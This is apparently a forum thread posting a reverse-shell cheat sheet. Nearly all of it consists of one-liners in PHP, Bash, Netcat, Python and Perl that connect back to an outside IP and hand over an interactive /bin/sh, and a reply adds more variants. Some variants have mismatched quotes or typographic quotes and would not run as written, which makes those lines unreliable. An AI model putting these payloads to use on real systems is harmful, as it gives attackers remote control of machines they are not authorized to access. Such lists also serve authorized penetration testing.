Reverse Shell Cheat Sheet

One-Liners

PHP

php -r ‘$sock=fsockopen(“192.168.0.10”,1234);exec("/bin/sh -i <&3 >&3 2>&3");’

Bash

bash -i >& /dev/tcp/192.168.0.1/8080 0>&1

Netcat

nc -e /bin/sh 192.168.0.10 1234

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.0.10”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

Perl

perl -e ‘use Socket;$i=“192.168.0.10”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

7 Likes

Netcat: nc 10.0.0.1 1234 -e /bin/sh

Perl: perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET, SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))) {open(STDIN,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};`

PHP: php -r '$sock=fsockopen("10.0.0.1",1234);exec('/bin/sh -i <&3 >&3 2>&3");`

MORE TO COME

is this to start a listener on a port from the IP in the sample here? or to inject a reverse shell on a linux machine?